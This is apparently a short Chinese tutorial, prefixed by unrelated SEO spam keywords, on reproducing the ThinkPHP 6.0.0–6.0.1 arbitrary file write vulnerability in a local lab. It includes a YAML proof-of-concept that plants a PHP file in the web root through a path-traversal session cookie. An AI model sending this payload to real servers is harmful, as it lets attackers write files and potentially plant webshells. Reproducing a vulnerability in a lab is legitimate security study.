宁波网站推广优化收费情况,新河企业做网站,网站建设方案范例,seo网站推广专员写在前面
一分钟表示是非常短的文章#xff0c;只会做简单的描述。旨在用较短的时间获取有用的信息
环境下载
官方环境下载器#xff1a;https://getcomposer.org/Composer-Setup.exe 下载文档时可以设置代理#xff0c;不然下载不上#xff0c;你懂的 下载成功 cmd cd…写在前面
一分钟表示是非常短的文章只会做简单的描述。旨在用较短的时间获取有用的信息
环境下载
官方环境下载器https://getcomposer.org/Composer-Setup.exe 下载文档时可以设置代理不然下载不上你懂的 下载成功 cmd cd 进入到你的www文件下 (在那里打开终端也行) 执行如下命令
composer create-project topthink/think tp60下载完成后进入tp60文件夹 找到该项目下的composer.json 更改这个位置版本为6.0.0 重新在该位置使用composer update 在当前位置继续使用php think run 开启成功 利用之前还需要开启session app/middleware.php 开启session功能 poc链接https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write ThinkPHP6任意文件操作漏洞,影响版本ThinkPHP6.0.0-6.0.1
name: poc-yaml-thinkphp-v6-file-write
set:f1: randomInt(800000000, 900000000)
rules:- method: GETpath: /{{f1}}.phpfollow_redirects: trueexpression: |response.status 404- method: GETpath: /headers:Cookie: PHPSESSID../../../../public/{{f1}}.phpfollow_redirects: trueexpression: |response.status 200 set-cookie in response.headers response.headers[set-cookie].bcontains(string(f1))- method: GETpath: /{{f1}}.phpfollow_redirects: trueexpression: |response.status 200 response.content_type.bcontains(btext/html)
detail:author: LoneyerAffected Version: Thinkphp 6.0.0links:- https://github.com/Loneyers/ThinkPHP6_Anyfile_operation_write写入成功
